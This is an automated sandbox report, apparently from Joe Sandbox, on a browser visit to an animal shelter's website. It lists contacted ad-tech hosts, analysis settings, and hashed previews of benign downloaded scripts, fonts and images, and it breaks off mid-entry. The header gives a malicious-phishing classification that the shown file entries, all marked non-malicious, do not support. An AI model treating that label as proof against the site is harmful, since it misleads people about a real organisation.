                                                                                                                                                                                                                                                        34.36.216.150
                                                                                                                                                                                                                                                        pixel-sync.sitescout.comUnited States
                                                                                                                                                                                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                        52.49.239.226
                                                                                                                                                                                                                                                        sync.crwdcntrl.netUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        34.111.113.62
                                                                                                                                                                                                                                                        pixel.tapad.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        142.250.181.226
                                                                                                                                                                                                                                                        td.doubleclick.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        98.98.135.24
                                                                                                                                                                                                                                                        pixel.sitescout.comUnited States
                                                                                                                                                                                                                                                        7018ATT-INTERNET4USfalse
                                                                                                                                                                                                                                                        34.98.64.218
                                                                                                                                                                                                                                                        us-u.openx.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        41.63.96.2
                                                                                                                                                                                                                                                        centro.vo.llnwd.netSouth Africa
                                                                                                                                                                                                                                                        22822LLNWUSfalse
                                                                                                                                                                                                                                                        185.121.15.137
                                                                                                                                                                                                                                                        leatherbook.orgSpain
                                                                                                                                                                                                                                                        207046REDSERVICIOESfalse
                                                                                                                                                                                                                                                        142.250.186.164
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        157.240.251.35
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                        52.208.198.158
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                                        192.168.2.4
                                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                        Analysis ID:1586410
                                                                                                                                                                                                                                                        Start date and time:2025-01-09 02:58:07 +01:00
                                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                        Overall analysis duration:0h 3m 24s
                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                        Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                        Sample URL:http://indyhumane.org
                                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                        Classification:mal52.phis.win@23/342@125/41
                                                                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.184.227, 142.250.74.206, 142.251.168.84, 142.250.184.206, 216.58.206.78, 142.250.181.238, 172.217.23.104, 142.250.186.106, 142.250.186.131, 172.217.18.14, 142.250.185.72, 142.250.181.234, 142.250.186.138, 142.250.184.202, 142.250.185.170, 142.250.184.234, 172.217.16.202, 142.250.185.234, 172.217.18.10, 216.58.206.42, 142.250.185.202, 142.250.186.42, 216.58.206.74, 142.250.186.170, 142.250.185.74, 142.250.185.106, 142.250.185.200, 199.232.214.172, 192.229.221.95, 142.250.186.78, 142.250.185.174, 142.250.185.162, 142.250.186.130, 142.250.185.206, 142.250.185.67, 34.104.35.123, 23.56.254.164, 4.175.87.197, 13.107.246.45
                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, www.googleadservices.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.googletagmanager.com, xandr-g-geo.trafficmanager.net, update.googleapis.com, clients.l.google.com, www.google-analytics.com
                                                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                        • VT rate limit hit for: http://indyhumane.org
                                                                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1558
                                                                                                                                                                                                                                                        Entropy (8bit):5.11458514637545
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                                                                                                                                                                                        MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                                                                                                                                                                        SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                                                                                                                                                                        SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                                                                                                                                                                        SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1864
                                                                                                                                                                                                                                                        Entropy (8bit):6.018989605004616
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:p/hUI1OwEU3AdIq7ak68O40E2szOxxUJ8BPFkf31U4PrHfqY3J5D:RnOwtQIq7aZ40E2sYUJAYRr/qYZ5D
                                                                                                                                                                                                                                                        MD5:C4709C1D483C9233A3A66A7E157624EA
                                                                                                                                                                                                                                                        SHA1:99A000EB5FE5CC1E94E3155EE075CD6E43DC7582
                                                                                                                                                                                                                                                        SHA-256:225243DC75352D63B0B9B2F48C8AAA09D55F3FB9E385741B12A1956A941880D9
                                                                                                                                                                                                                                                        SHA-512:B45E1FD999D1340CC5EB5A49A4CD967DC736EA3F4EC8B02227577CC3D1E903341BE3217FBB0B74765C72085AC51C63EEF6DCB169D137BBAF3CC49E21EA6468D7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJVczFpOUt3Zm5uMThTVVR1RVItRXBDTTMwVzFkNTc0cGJwUlJSdGJYM0JVIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiM0hiWThLc3poeEF6UDVSUU9fZEpvZGNwbEtpRXR0RWh2UmZMZEtjSTdjZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC4xMS44LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"lGxZ1-AH7F8MftKSBdZiFULmC8hZkIHy1_2XIoU81Z5mK0wHVwNV7-55CBTcuuvKjTje-AnKLDoG4S0A_Jeg4lSQK5V_Q4f6JVqp5Vj_ge86YkRZEv4m1bjKRY4N17SHobwuH8Hc_kAugFIlG1LIDHnrm1N7ZWIqo3fVlnVqgSstmvFXAhBazgs1UYRi3hPjPM6e1q1i2N1mIUbxLvG41frGo2QJ8W5J3buUjzs-0y250k-YkadKAR0
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):66
                                                                                                                                                                                                                                                        Entropy (8bit):3.820000180714897
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:SVzHL3phUmWRDNKydvgHVz:SBHLLUmWRbCp
                                                                                                                                                                                                                                                        MD5:BBEC7670A2519FEB0627F17D0C0B5276
                                                                                                                                                                                                                                                        SHA1:9C30B996F1B069F86EF7C0136DFAF7E614674DEA
                                                                                                                                                                                                                                                        SHA-256:670A6F6BBADAB2C2BE63898525FCAF72E7454739E77C04D120BC1A46B6694CAC
                                                                                                                                                                                                                                                        SHA-512:1ED4ED6AE2A2CBE86F9E8C6C7A2672EBB2F37DBE83D2BF09D875DB435ED63BF5F5CF60CA846865166F9A498095F6D61BD51B0A092E097430439E8A5A3A14CB15
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:1.03cccbb22b17080279ea1707c9ab093c59f4f4dd09580c841cfa794cb372228d
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):85
                                                                                                                                                                                                                                                        Entropy (8bit):4.462192586591686
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1kULJVPY:F6VlM8aRWpqS1kSJVg
                                                                                                                                                                                                                                                        MD5:084E339C0C9FE898102815EAC9A7CDEA
                                                                                                                                                                                                                                                        SHA1:6ABF7EAAA407D2EAB8706361E5A2E5F776D6C644
                                                                                                                                                                                                                                                        SHA-256:52CD62F4AC1F9E7D7C4944EE111F84A42337D16D5DE7BE296E945146D6D7DC15
                                                                                                                                                                                                                                                        SHA-512:0B67A89F3EBFF6FEC3796F481EC2AFBAC233CF64FDC618EC6BA1C12AE125F28B27EE09E8CD0FADB8F6C8785C83929EA6F751E0DDF592DD072AB2CF439BD28534
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.11.8.0".}
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9817
                                                                                                                                                                                                                                                        Entropy (8bit):4.629347296880043
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJl:v5C4ql7BkIVmtRTGXvcxBsl
                                                                                                                                                                                                                                                        MD5:8C702C686B703020BC0290BAFC90D7A0
                                                                                                                                                                                                                                                        SHA1:EB08FF7885B4C1DE3EF3D61E40697C0C71903E27
                                                                                                                                                                                                                                                        SHA-256:97D9E39021512305820F27B9662F0351E45639124F5BD29F0466E9072A9D0C62
                                                                                                                                                                                                                                                        SHA-512:6137D0ED10E6A27924ED3AB6A0C5F9B21EB0E16A876447DADABD88338198F31BB9D89EF8F0630F4573EA34A24FB3FD3365D7EA78A97BA10028A0758E0A550739
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5960)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):278500
                                                                                                                                                                                                                                                        Entropy (8bit):5.583687365230505
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:E+Cy+3IsyyHu2SVNF2KonhsGM5/GDhNcvnzHV+:rgItau2QpGDfiTo
                                                                                                                                                                                                                                                        MD5:1BA4DCFE962608BBF8A7DC301E6E8BC2
                                                                                                                                                                                                                                                        SHA1:A5A786C6E3A4692E7AD1E2047571AE9E054FFCB7
                                                                                                                                                                                                                                                        SHA-256:6DA029AEF548AC1E69AA0FD7D7509E620B72D513BA503D408C92B5CE67BEE92B
                                                                                                                                                                                                                                                        SHA-512:4CDA698894290544C7A7EE8FC4B83237512F9DC9B1A2901EB8445AA4009D5D490331CFE7C7CE096C593EE41ADA9FE9BBBF8F0F452CF15C3083B96580DFB936A0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1412), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1412
                                                                                                                                                                                                                                                        Entropy (8bit):5.120719291993871
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:rs1trgBRFKORXw2wu43OleYsh8RcK5EaQ0HCyBhDXLWowGXPHDOzEcAuATeITlT3:41t0BjKZ2wu43OeJWRNnQ0iyXHWozjOo
                                                                                                                                                                                                                                                        MD5:04E3256D2C4A04631C3B8C59000983D1
                                                                                                                                                                                                                                                        SHA1:844329BF98D569CCDD6243077C38B00155B98E14
                                                                                                                                                                                                                                                        SHA-256:82003ADA03A923689E7A52A15DB71BCB7F32A606976908EBCD8068FD1E677FB1
                                                                                                                                                                                                                                                        SHA-512:E9662DE3E96E96BE49E3EFEE13F97B8386B849481F8AAC5449C19EF4EBF05E12C2421C3B1900BE74C1AA075BD71460B6CE1FF5C5DFAEB2D1FD7980FF254E2CEA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:void 0===TCB_Front.js_modules["post-grid-compat"]&&TCB_Front.setModuleLoadedStatus("post-grid-compat",!1),(t=>{if(TCB_Front.isModuleLoaded("post-grid-compat"))return;window.addEventListener("load",(function(){o.postGridLayout()}));const o={postGridLayout(){try{t(".tve_post_grid_masonry,.tcb-post-list.masonry").each((function(){const o=this.dataset.masonry?JSON.parse(this.dataset.masonry):{},s=TCB_Front.getDisplayType()[0];void 0!==o[`gutter-${s}`]&&(o.gutter=parseInt(o[`gutter-${s}`])),t(this).masonry(o).css("opacity",1)}))}catch(t){console.log(t)}const o=t(".tve_post_grid_grid");o.length<=0||o.find(".tve_pg_row").each((function(){let o=0;const s=t(this).css("height","");s.find(".tve_post").each((function(){const s=t(this),e=s.outerHeight();e>o&&(o=e),s.css("height","100%")})),s.css("height",o-1+"px")}))}};t(window).on("tcb_after_dom_ready",(()=>{o.postGridLayout(),TCB_Front.Utils.isEditorPage()||TCB_Front.addResizeCallback(o.postGridLayout)})).on("tcb_toggle_open",(()=>o.postGridLayou
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5268)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):329019
                                                                                                                                                                                                                                                        Entropy (8bit):5.575639666472008
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:jEXy+3IsyjHuSSVQF6STnhsGC5H0uGDhNcvnzHV6:jEzItDuSbRuGDfiT0
                                                                                                                                                                                                                                                        MD5:E77D02DA261C9C665C3B7136F8BAF67D
                                                                                                                                                                                                                                                        SHA1:09BF6AB675B4E83D604F6D269DED404873CE9395
                                                                                                                                                                                                                                                        SHA-256:1EDC87898167DFC36FD0D2983DBC403570BB3624942806CDF23AF5A391720B83
                                                                                                                                                                                                                                                        SHA-512:64BA11E0DBC80B974B3EBE4EBABAA7EB294223FC4DBEB7E406741229D3AB1305BE416428ECB1736541AE2C689C0CEF9BEBEB710EF1D5EF15B5AAC64BC4AD6B27
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-CDQ7BLPKF7
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4135
                                                                                                                                                                                                                                                        Entropy (8bit):5.35479580795388
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:jOS7dcJc+ufOS7d5NkOLdcJc+ufOLd5NkOgdcJc+ufOgd5NkOCdcJc+ufOCd5NkS:57eY7jexYe+6eMfeFO
                                                                                                                                                                                                                                                        MD5:BBDC10857A20023835253C56EC196D3A
                                                                                                                                                                                                                                                        SHA1:5A1959659DD4B7E9DF49CDF2B429B94F04E1F41F
                                                                                                                                                                                                                                                        SHA-256:1D9334A96917EB5C7BD4C07F66E8BDA2F9C31786E710F06FE9DD332481C3E8B9
                                                                                                                                                                                                                                                        SHA-512:9B8531D94B31665DE81147CD3719DD70504B74A602AFC591D5354621CCA40BB256DD9AF043632BD4F62D3C164DB2312639B760D70DE1946B00B657A54B9B8F9A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=DM+Sans:700,500,400,800,100&subset=latin"
                                                                                                                                                                                                                                                        Preview:/* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu6-K6h9Q.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu0-K4.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9V
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):28690
                                                                                                                                                                                                                                                        Entropy (8bit):7.969230938264276
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:VNYg4mMrSSNd3C05Q2ZH+J0m9lp8TBixXUx4N:VN4tc2Z0Tm+EeN
                                                                                                                                                                                                                                                        MD5:B21592328AC0DA1822ABA3DFE7EBACBA
                                                                                                                                                                                                                                                        SHA1:B6A5C4B7C9399BE13924BA23C59919B6A5BF962B
                                                                                                                                                                                                                                                        SHA-256:24E8FD3D6CA9D02C1C0337E7A62FB7B00D6D57E828CD627B98902D8F9A050FDE
                                                                                                                                                                                                                                                        SHA-512:3E1CC656E422B17EBA8C5653C349718866DFEEC4A611D1D4F63EB16CA9B6ADAC99C0F60EB1C71DE235298FBA21C9D7897D80202D73476861939F3EE2C561835C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/9c7b31b0-07c0-40bd-b310-3075efde3ec6.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Vl..kNNs..8...A../Zs.i...^.<.}+...+N#.R..=j.}+>.._......SV.Ldl*......(..0....0.T&.T..XsQ..Q..@....P.T.}...1O..W.LDPr........qQA.....L....Z.....>.@....T....Q.`%M.D.L...f*..V*..B,GW"5Q*.t.....Z.......S..RS...@.4.RQE.....B..5..........5...@..6S...L..........4.#..9..M."..(e..%.+..-.O..fb..$.z~.f.Qq....U.....;....9....3.+Z...J. ..J.......X3E7......U...h...p.-d#&N..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9956), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9956
                                                                                                                                                                                                                                                        Entropy (8bit):5.112190098883882
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:FkNkq5EkG7Dbce7Mw8YKi3wjZqXdoRw7f2mMR8kHcQFDervnba4b3OjJ8frBy5Nq:GWq5EkG3bxIwuiMqXdOkemMCkHXFozDT
                                                                                                                                                                                                                                                        MD5:70218C74BDB4EFC16FE5AFD8FF76F10F
                                                                                                                                                                                                                                                        SHA1:407FB8E3944DF84CD26A54D3D2CF0FCA5AE01DE8
                                                                                                                                                                                                                                                        SHA-256:27755BD63EC28B85EA92DB1879E49759B6B6B80682506FF3233AB8E896A34F66
                                                                                                                                                                                                                                                        SHA-512:83F4A330048D131258957A100131DF8FA4C50876FFCF6F752300C2BE7860732E6011084BD675CF4ACF99C4AE88FC5B89D1B3648FEECB094B3BA7246EA28B5211
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(()=>{var e={69158:e=>{void 0===TCB_Front.js_modules["search-form"]&&TCB_Front.setModuleLoadedStatus("search-form",!1),((t,i)=>{if(TCB_Front.isModuleLoaded("search-form"))return;const s=".thrv-search-form",a=e=>{try{new n(t(e),!!TCB_Front.Utils.isEditorPage())}catch(e){}};window.addEventListener("load",(()=>{i.$body.find(s).each(((e,t)=>{a(t)}))})),t(window).on("tcb_after_dom_ready",(()=>{t(s).each(((e,t)=>{a(t)}))}));class n{constructor(e,t=!0){e.is(s)&&!e.hasClass("thrv-sticky-search")&&(e.data("tcb.search")&&!t||(this.$element=e,this.$form=e.find("form"),this.$input=e.find(".thrv-sf-input"),this.$submit=e.find(".thrv-sf-submit"),this.$submitButton=this.$submit.find("button"),this.isEditor=t,this.$input.removeClass("thrv-sf-input-hide"),this.onResize(),this.isEditor?this.$form.off("submit").on("submit",(()=>!1)):this.bindEvents(),this.$element.attr("id")&&this.$element.attr("data-selector",`${s}#${this.$element.attr("id")}`),e.data("tcb.search",this)))}onResize(){this.readData(),this
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13479)
